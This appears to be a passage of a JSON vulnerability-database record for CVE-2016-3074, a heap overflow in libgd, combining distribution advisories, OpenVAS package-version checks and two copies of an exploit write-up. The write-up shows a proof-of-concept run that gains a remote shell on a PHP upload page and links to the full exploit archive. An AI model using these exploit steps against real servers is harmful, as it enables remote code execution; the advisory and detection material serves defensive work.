"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.383127", "type": "slackware", "title": "[slackware-security] php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2017-12-31T23:14:17", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-04-26T00:00:00", "type": "zdt", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "1337DAY-ID-25407", "href": "https://0day.today/exploit/description/25407", "sourceData": "Overview\r\n========\r\n \r\nlibgd [1] is an open-source image library. It is perhaps primarily used\r\nby the PHP project. It has been bundled with the default installation\r\nof PHP since version 4.3 [2].\r\n \r\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\r\nmay result in a heap overflow when processing compressed gd2 data.\r\n \r\n \r\nDetails\r\n=======\r\n \r\n4 bytes representing the chunk index size is stored in a signed integer,\r\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 53 typedef struct {\r\n| 54 int offset;\r\n| 55 int size;\r\n| 56 }\r\n| 57 t_chunk_info;\r\n`----\r\n \r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 65 static int\r\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\r\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\r\n| 68 t_chunk_info ** chunkIdx)\r\n| 69 {\r\n| ...\r\n| 73 t_chunk_info *cidx;\r\n| ...\r\n| 155 if (gd2_compressed (*fmt)) {\r\n| ...\r\n| 163 for (i = 0; i < nc; i++) {\r\n| ...\r\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\r\n| 168 goto fail2;\r\n| 169 };\r\n| 170 };\r\n| 171 *chunkIdx = cidx;\r\n| 172 };\r\n| ...\r\n| 181 }\r\n`----\r\n \r\n \r\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\r\nallocates memory for the compressed data based on the value of the\r\nlargest chunk size:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 371|637 if (gd2_compressed (fmt)) {\r\n| 372|638 /* Find the maximum compressed chunk size. */\r\n| 373|639 compMax = 0;\r\n| 374|640 for (i = 0; (i < nc); i++) {\r\n| 375|641 if (chunkIdx[i].size > compMax) {\r\n| 376|642 compMax = chunkIdx[i].size;\r\n| 377|643 };\r\n| 378|644 };\r\n| 379|645 compMax++;\r\n| ...|...\r\n| 387|656 compBuf = gdCalloc (compMax, 1);\r\n| ...|...\r\n| 393|661 };\r\n`----\r\n \r\n \r\nA size of <= 0 results in `compMax' retaining its initial value during\r\nthe loop, followed by it being incremented to 1. Since `compMax' is\r\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\r\nfor `compBuf'.\r\n \r\nThis is followed by compressed data being read to `compBuf' based on the\r\ncurrent (potentially negative) chunk size:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\r\n| 340 {\r\n| ...\r\n| 413 if (gd2_compressed (fmt)) {\r\n| 414\r\n| 415 chunkLen = chunkMax;\r\n| 416\r\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 418 compBuf,\r\n| 419 chunkIdx[chunkNum].size,\r\n| 420 (char *) chunkBuf, &chunkLen, in)) {\r\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\r\n| 422 goto fail;\r\n| 423 };\r\n| 424\r\n| 425 chunkPos = 0;\r\n| 426 };\r\n| ...\r\n| 501 }\r\n`----\r\n \r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\r\n| 586 {\r\n| ...\r\n| 713 if (!gd2_compressed (fmt)) {\r\n| ...\r\n| 731 } else {\r\n| 732 chunkNum = cx + cy * ncx;\r\n| 733\r\n| 734 chunkLen = chunkMax;\r\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 736 compBuf,\r\n| 737 chunkIdx[chunkNum].size,\r\n| 738 (char *) chunkBuf, &chunkLen, in)) {\r\n| 739 printf (\"Error reading comproessed chunk\\n\");\r\n| 740 goto fail2;\r\n| 741 };\r\n| ...\r\n| 746 };\r\n| ...\r\n| 815 }\r\n`----\r\n \r\n \r\nThe size is subsequently interpreted as a size_t by `fread()' or\r\n`memcpy()', depending on how the image is read:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 221 static int\r\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\r\n| 223 uLongf * chunkLen, gdIOCtx * in)\r\n| 224 {\r\n| ...\r\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\r\n| 237 return FALSE;\r\n| 238 };\r\n| ...\r\n| 251 }\r\n`----\r\n \r\nlibgd-2.1.1/src/gd_io.c:\r\n,----\r\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\r\n| 212 {\r\n| 213 return (ctx->getBuf)(ctx, buf, size);\r\n| 214 }\r\n`----\r\n \r\n \r\nFor file contexts:\r\n \r\nlibgd-2.1.1/src/gd_io_file.c:\r\n,----\r\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\r\n| 53 {\r\n| ...\r\n| 67 ctx->ctx.getBuf = fileGetbuf;\r\n| ...\r\n| 76 }\r\n| ...\r\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\r\n| 93 {\r\n| 94 fileIOCtx *fctx;\r\n| 95 fctx = (fileIOCtx *)ctx;\r\n| 96\r\n| 97 return (fread(buf, 1, size, fctx->f));\r\n| 98 }\r\n`----\r\n \r\n \r\nAnd for dynamic contexts:\r\n \r\nlibgd-2.1.1/src/gd_io_dp.c:\r\n,----\r\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\r\n| 75 {\r\n| ...\r\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\r\n| ...\r\n| 104 }\r\n| ...\r\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\r\n| 257 {\r\n| ...\r\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\r\n| ...\r\n| 284 }\r\n`----\r\n \r\n \r\nPoC\r\n===\r\n \r\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\r\n \r\n,----\r\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n| [*] this may take a while\r\n| [*] offset 912 of 10000...\r\n| [+] connected to 1.2.3.4:5555\r\n| id\r\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n| \r\n| uname -a\r\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n| \r\n| dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n| \r\n| cat upload.php\r\n| <?php\r\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n| ?>\r\n`----\r\n \r\n \r\nSolution\r\n========\r\n \r\nThis bug has been fixed in git HEAD [4].\r\n \r\nFull Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip\r\n \r\nFootnotes\r\n_________\r\n \r\n[1] [http://libgd.org/]\r\n[2] [https://en.wikipedia.org/wiki/Libgd]\r\n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\r\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25407"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. ", "modified": "2016-04-30T00:27:18", "published": "2016-04-30T00:27:18", "id": "FEDORA:73AFA606D3C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: gd-2.1.1-5.fc23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. ", "modified": "2016-05-07T12:28:06", "published": "2016-05-07T12:28:06", "id": "FEDORA:4C10A6062BF1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: gd-2.1.1-7.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. ", "modified": "2016-05-16T14:58:01", "published": "2016-05-16T14:58:01", "id": "FEDORA:49506619160F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: gd-2.1.1-3.fc22", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "\nThe PHP Group reports:\n\nBCMath:\n\t \nFixed bug #72093 (bcpowmod accepts negative scale and corrupts\n\t _one_ definition).\n\nExif:\n\t \nFixed bug #72094 (Out of bounds heap read access in exif header\n\t processing).\n\nGD:\n\t \nFixed bug #71912 (libgd: signedness vulnerability).\n\t (CVE-2016-3074)\n\nIntl:\n\t \nFixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos\n\t with negative offset).\n\nXML:\n\t \nFixed bug #72099 (xml_parse_into_struct segmentation fault).\n\t \n\n\n\n", "edition": 4, "modified": "2016-04-28T00:00:00", "published": "2016-04-28T00:00:00", "id": "5764C634-10D2-11E6-94FA-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/5764c634-10d2-11e6-94fa-002590263bf5.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-04-26T18:10:10", "description": "libgd 2.1.1 - Signedness Heap Overflow. CVE-2016-3074. Remote exploit for linux platform", "published": "2016-04-26T00:00:00", "type": "exploitdb", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "EDB-ID:39736", "href": "https://www.exploit-db.com/exploits/39736/", "sourceData": "Overview\r\n========\r\n\r\nlibgd [1] is an open-source image library. It is perhaps primarily used\r\nby the PHP project. It has been bundled with the default installation\r\nof PHP since version 4.3 [2].\r\n\r\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\r\nmay result in a heap overflow when processing compressed gd2 data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\n4 bytes representing the chunk index size is stored in a signed integer,\r\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 53 typedef struct {\r\n| 54 int offset;\r\n| 55 int size;\r\n| 56 }\r\n| 57 t_chunk_info;\r\n`----\r\n\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 65 static int\r\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\r\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\r\n| 68 t_chunk_info ** chunkIdx)\r\n| 69 {\r\n| ...\r\n| 73 t_chunk_info *cidx;\r\n| ...\r\n| 155 if (gd2_compressed (*fmt)) {\r\n| ...\r\n| 163 for (i = 0; i < nc; i++) {\r\n| ...\r\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\r\n| 168 goto fail2;\r\n| 169 };\r\n| 170 };\r\n| 171 *chunkIdx = cidx;\r\n| 172 };\r\n| ...\r\n| 181 }\r\n`----\r\n\r\n\r\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\r\nallocates memory for the compressed data based on the value of the\r\nlargest chunk size:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 371|637 if (gd2_compressed (fmt)) {\r\n| 372|638 /* Find the maximum compressed chunk size. */\r\n| 373|639 compMax = 0;\r\n| 374|640 for (i = 0; (i < nc); i++) {\r\n| 375|641 if (chunkIdx[i].size > compMax) {\r\n| 376|642 compMax = chunkIdx[i].size;\r\n| 377|643 };\r\n| 378|644 };\r\n| 379|645 compMax++;\r\n| ...|...\r\n| 387|656 compBuf = gdCalloc (compMax, 1);\r\n| ...|...\r\n| 393|661 };\r\n`----\r\n\r\n\r\nA size of <= 0 results in `compMax' retaining its initial value during\r\nthe loop, followed by it being incremented to 1. Since `compMax' is\r\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\r\nfor `compBuf'.\r\n\r\nThis is followed by compressed data being read to `compBuf' based on the\r\ncurrent (potentially negative) chunk size:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\r\n| 340 {\r\n| ...\r\n| 413 if (gd2_compressed (fmt)) {\r\n| 414\r\n| 415 chunkLen = chunkMax;\r\n| 416\r\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 418 compBuf,\r\n| 419 chunkIdx[chunkNum].size,\r\n| 420 (char *) chunkBuf, &chunkLen, in)) {\r\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\r\n| 422 goto fail;\r\n| 423 };\r\n| 424\r\n| 425 chunkPos = 0;\r\n| 426 };\r\n| ...\r\n| 501 }\r\n`----\r\n\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\r\n| 586 {\r\n| ...\r\n| 713 if (!gd2_compressed (fmt)) {\r\n| ...\r\n| 731 } else {\r\n| 732 chunkNum = cx + cy * ncx;\r\n| 733\r\n| 734 chunkLen = chunkMax;\r\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 736 compBuf,\r\n| 737 chunkIdx[chunkNum].size,\r\n| 738 (char *) chunkBuf, &chunkLen, in)) {\r\n| 739 printf (\"Error reading comproessed chunk\\n\");\r\n| 740 goto fail2;\r\n| 741 };\r\n| ...\r\n| 746 };\r\n| ...\r\n| 815 }\r\n`----\r\n\r\n\r\nThe size is subsequently interpreted as a size_t by `fread()' or\r\n`memcpy()', depending on how the image is read:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 221 static int\r\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\r\n| 223 uLongf * chunkLen, gdIOCtx * in)\r\n| 224 {\r\n| ...\r\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\r\n| 237 return FALSE;\r\n| 238 };\r\n| ...\r\n| 251 }\r\n`----\r\n\r\nlibgd-2.1.1/src/gd_io.c:\r\n,----\r\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\r\n| 212 {\r\n| 213 return (ctx->getBuf)(ctx, buf, size);\r\n| 214 }\r\n`----\r\n\r\n\r\nFor file contexts:\r\n\r\nlibgd-2.1.1/src/gd_io_file.c:\r\n,----\r\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\r\n| 53 {\r\n| ...\r\n| 67 ctx->ctx.getBuf = fileGetbuf;\r\n| ...\r\n| 76 }\r\n| ...\r\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\r\n| 93 {\r\n| 94 fileIOCtx *fctx;\r\n| 95 fctx = (fileIOCtx *)ctx;\r\n| 96\r\n| 97 return (fread(buf, 1, size, fctx->f));\r\n| 98 }\r\n`----\r\n\r\n\r\nAnd for dynamic contexts:\r\n\r\nlibgd-2.1.1/src/gd_io_dp.c:\r\n,----\r\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\r\n| 75 {\r\n| ...\r\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\r\n| ...\r\n| 104 }\r\n| ...\r\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\r\n| 257 {\r\n| ...\r\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\r\n| ...\r\n| 284 }\r\n`----\r\n\r\n\r\nPoC\r\n===\r\n\r\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\r\n\r\n,----\r\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n| [*] this may take a while\r\n| [*] offset 912 of 10000...\r\n| [+] connected to 1.2.3.4:5555\r\n| id\r\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n| \r\n| uname -a\r\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n| \r\n| dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n| \r\n| cat upload.php\r\n| <?php\r\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n| ?>\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nThis bug has been fixed in git HEAD [4].\r\n\r\nFull Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip\r\n\r\nFootnotes\r\n_________\r\n\r\n[1] [http://libgd.org/]\r\n[2] [https://en.wikipedia.org/wiki/Libgd]\r\n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\r\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39736/"}], "openvas": [{"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.", "modified": "2019-03-18T00:00:00", "published": "2016-04-24T00:00:00", "id": "OPENVAS:1361412562310703556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703556", "type": "openvas", "title": "Debian Security Advisory DSA 3556-1 (libgd2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3556.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3556-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703556\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-3074\");\n script_name(\"Debian Security Advisory DSA 3556-1 (libgd2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-24 00:00:00 +0200 (Sun, 24 Apr 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3556.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|7)\");\n script_tag(name:\"affected\", value:\"libgd2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\");\n script_tag(name:\"summary\", value:\"Hans Jerry Illikainen discovered that\nlibgd2, a library for programmatic graphics creation and manipulation, suffers\nof a signedness vulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libgd-dbg:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd-dbg:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-dev:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd-dev:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libgd-tools\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-noxpm-dev\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:i386\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "Mageia Linux Local Security Checks mgasa-2016-0152", "modified": "2019-03-14T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310131297", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131297", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0152", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0152.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131297\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:00 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0152\");\n script_tag(name:\"insight\", value:\"Updated libgd packages fix security vulnerability: A signedness vulnerability exists in libgd 2.1.1 and earlier which may result in a heap overflow when processing compressed gd2 data (CVE-2016-3074).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0152.html\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0152\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libgd\", rpm:\"libgd~2.1.1~1.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 